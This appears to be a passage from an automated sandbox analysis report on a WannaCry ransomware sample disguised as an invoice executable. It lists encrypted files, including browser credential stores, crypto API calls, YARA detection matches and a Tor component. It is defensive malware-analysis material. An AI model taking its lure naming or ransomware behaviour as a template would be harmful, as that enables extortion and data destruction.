            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\7TU8ICAJ\6hU_LneafI_NFLeDvM367ebFaKQ[1].js.WNCRY (copy) entropy: 7.99037158838Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\7TU8ICAJ\th[2].png.WNCRY (copy) entropy: 7.99141359559Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\7TU8ICAJ\th[3].png.WNCRY (copy) entropy: 7.99304008674Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\HPRDNLKN\th[1].png.WNCRY (copy) entropy: 7.99069753968Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\HPRDNLKN\th[1].svg.WNCRY (copy) entropy: 7.99842666446Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\QTRC1JK9\th[1].svg.WNCRY (copy) entropy: 7.99823264997Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\QTRC1JK9\th[2].png.WNCRY (copy) entropy: 7.99234076161Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\QTRC1JK9\X6j0qPgNij1n_IogMJrgYaT9Kp8[1].js.WNCRY (copy) entropy: 7.99175047349Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\QTRC1JK9\y1DovzXWmZOic4QXLXu-qBKEMRM.br[1].js.WNCRY (copy) entropy: 7.99733463819Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\CacheStorage\CacheStorage.edb.WNCRY (copy) entropy: 7.99989735433Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\Indexed DB\IndexedDB.edb.WNCRY (copy) entropy: 7.99990451898Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\GLEAM-DARK.svg.WNCRY (copy) entropy: 7.99811760784Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\GLEAM-LIGHT.svg.WNCRY (copy) entropy: 7.99829537033Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\cert9.db.WNCRY (copy) entropy: 7.99919248056Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\key4.db.WNCRY (copy) entropy: 7.99921736722Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Temp\19.WNCRYT (copy) entropy: 7.99931242378Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Temp\20.WNCRYT (copy) entropy: 7.99937050114Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Temp\42.WNCRYT (copy) entropy: 7.99925170269Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 10_2_10003F00 GetFileAttributesA,GetFileAttributesA,CreateFileA,GetFileSize,GlobalAlloc,ReadFile,GetFileAttributesA,CryptImportKey,_local_unwind2,_local_unwind2,10_2_10003F00
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 10_2_10003AC0 CryptImportKey,CryptImportKey,CryptDestroyKey,10_2_10003AC0
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 10_2_10004440 CryptAcquireContextA,wcsrchr,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CryptAcquireContextA,CryptImportKey,CryptDestroyKey,CryptEncrypt,CryptDecrypt,10_2_10004440

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 10.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.a48ba8.0.unpack, type: UNPACKEDPEMatched rule: WanaCry Payload Author: kevoreilly
            Source: 10.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.10000000.1.unpack, type: UNPACKEDPEMatched rule: WanaCry Payload Author: kevoreilly
            Source: 59.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
            Source: 10.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.a48ba8.0.raw.unpack, type: UNPACKEDPEMatched rule: WanaCry Payload Author: kevoreilly
            Source: 10.0.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
            Source: 10.0.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
            Source: 10.0.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
            Source: 0000000A.00000002.3004531388.000000000040F000.00000004.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
            Source: 0000000A.00000000.2272165012.000000000040E000.00000008.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
            Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth
            Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth
            Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth
            Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
            Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
            Source: C:\Users\user\Desktop\r.wnry, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth
            Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth
            Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
            Source: C:\Users\user\Desktop\118491705402797.bat, type: DROPPEDMatched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
            Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth
            Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth
            Source: C:\Users\user\Desktop\u.wnry, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe, type: DROPPEDMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe, type: DROPPEDMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 10_2_1000694010_2_10006940
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 10_2_1000664010_2_10006640
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 10_2_1000628010_2_10006280
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 10_2_10005DC010_2_10005DC0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD614B086_2_6CD614B0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD7087086_2_6CD70870
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD69C1086_2_6CD69C10
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD67DA086_2_6CD67DA0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD6B14086_2_6CD6B140
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD69EF086_2_6CD69EF0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD63A5086_2_6CD63A50
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD68E7086_2_6CD68E70
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD61B9086_2_6CD61B90
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD61F8986_2_6CD61F89
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD6CBB586_2_6CD6CBB5
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD61F5086_2_6CD61F50
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD63F2086_2_6CD63F20
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD6EB2086_2_6CD6EB20
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDABCC886_2_6CDABCC8
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDA8CC986_2_6CDA8CC9
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCBCF086_2_6CDCBCF0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDAFC8C86_2_6CDAFC8C
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD98B2086_2_6CD98B20
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB0C0986_2_6CDB0C09
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD7C0086_2_6CDD7C00
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCBCF086_2_6CDCBCF0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB6DE986_2_6CDB6DE9
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD9DDEC86_2_6CD9DDEC
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB6D9986_2_6CDB6D99
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDA8D8086_2_6CDA8D80
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDAA8E086_2_6CDAA8E0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD9FD2C86_2_6CD9FD2C
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD93EF086_2_6CD93EF0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC9E8086_2_6CDC9E80
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB2FB086_2_6CDB2FB0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDA2FA286_2_6CDA2FA2
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDA8D8086_2_6CDA8D80
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC4F4086_2_6CDC4F40
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDA8F4786_2_6CDA8F47
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD7C0086_2_6CDD7C00
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDAA8E086_2_6CDAA8E0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB0C0986_2_6CDB0C09
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDADB4086_2_6CDADB40
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCF87086_2_6CDCF870
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC95D086_2_6CDC95D0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD929B086_2_6CD929B0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD9FD2C86_2_6CD9FD2C
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB397086_2_6CDB3970
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC693086_2_6CDC6930
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDAA8E086_2_6CDAA8E0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB42C086_2_6CDB42C0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB629086_2_6CDB6290
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB629086_2_6CDB6290
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB42C086_2_6CDB42C0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB42C086_2_6CDB42C0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDA8B9086_2_6CDA8B90
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB0C0986_2_6CDB0C09
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC95D086_2_6CDC95D0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDADB4086_2_6CDADB40
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB629086_2_6CDB6290
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDAA8E086_2_6CDAA8E0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCF87086_2_6CDCF870
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB629086_2_6CDB6290
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD929B086_2_6CD929B0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD98B2086_2_6CD98B20
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC95D086_2_6CDC95D0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB629086_2_6CDB6290
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDBE6A086_2_6CDBE6A0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDA845086_2_6CDA8450
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD032086_2_6CDD0320
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDDC40086_2_6CDDC400
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC95D086_2_6CDC95D0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC000086_2_6CDC0000
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD929B086_2_6CD929B0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD916C486_2_6CD916C4
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDDC40086_2_6CDDC400
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDBE6A086_2_6CDBE6A0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB42C086_2_6CDB42C0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDADB4086_2_6CDADB40
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD9DDEC86_2_6CD9DDEC
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB42C086_2_6CDB42C0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB773286_2_6CDB7732
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD60E086_2_6CDD60E0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC000086_2_6CDC0000
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDA903086_2_6CDA9030
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC9E8086_2_6CDC9E80
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB2FB086_2_6CDB2FB0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB42C086_2_6CDB42C0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDAF2FB86_2_6CDAF2FB
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB629086_2_6CDB6290
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC693086_2_6CDC6930
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDDB26086_2_6CDDB260
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCA3C086_2_6CDCA3C0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDBC3F086_2_6CDBC3F0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC000086_2_6CDC0000
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDDB26086_2_6CDDB260
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC431086_2_6CDC4310
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD032086_2_6CDD0320
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CED6BA086_2_6CED6BA0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE4CCD086_2_6CE4CCD0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE62CD086_2_6CE62CD0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CEF6CB086_2_6CEF6CB0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CEC2C9086_2_6CEC2C90
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE80C0086_2_6CE80C00
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE44DB086_2_6CE44DB0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF2CD6086_2_6CF2CD60
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CEE8D7086_2_6CEE8D70
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE5AD5D86_2_6CE5AD5D
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE30A3086_2_6CE30A30
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CECCD1086_2_6CECCD10
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF58EF086_2_6CF58EF0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE2CEF986_2_6CE2CEF9
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE30EC086_2_6CE30EC0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE54EA086_2_6CE54EA0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE50EA986_2_6CE50EA9
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE22EB086_2_6CE22EB0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE4CE8086_2_6CE4CE80
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE60E6086_2_6CE60E60
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CEBEE6086_2_6CEBEE60
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE44E4086_2_6CE44E40
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE66E2086_2_6CE66E20
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE74E0086_2_6CE74E00
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF44E0086_2_6CF44E00
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE32FFC86_2_6CE32FFC
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE5EFC086_2_6CE5EFC0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF42FB086_2_6CF42FB0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE4AFB086_2_6CE4AFB0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE58F8086_2_6CE58F80
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF74F8086_2_6CF74F80
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CEA4F9086_2_6CEA4F90
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE22EB086_2_6CE22EB0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CEB28F086_2_6CEB28F0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE2C8B086_2_6CE2C8B0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CEAA88086_2_6CEAA880
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF7888086_2_6CF78880
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF3E86086_2_6CF3E860
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE5084686_2_6CE50846
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF0684086_2_6CF06840
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE6885086_2_6CE68850
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CEEA85086_2_6CEEA850
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE5480086_2_6CE54800
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE6680086_2_6CE66800
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF489F086_2_6CF489F0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF369C086_2_6CF369C0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE5A9D086_2_6CE5A9D0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE549D086_2_6CE549D0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF6299086_2_6CF62990
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE8298086_2_6CE82980
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CF4298086_2_6CF42980
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE4694086_2_6CE46940
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE4892086_2_6CE48920
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE6292086_2_6CE62920
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE7E90086_2_6CE7E900
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE32A8086_2_6CE32A80
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE4AA8086_2_6CE4AA80
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE56A6086_2_6CE56A60
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE5CA4086_2_6CE5CA40
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE3216086_2_6CE32160
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CE30A3086_2_6CE30A30
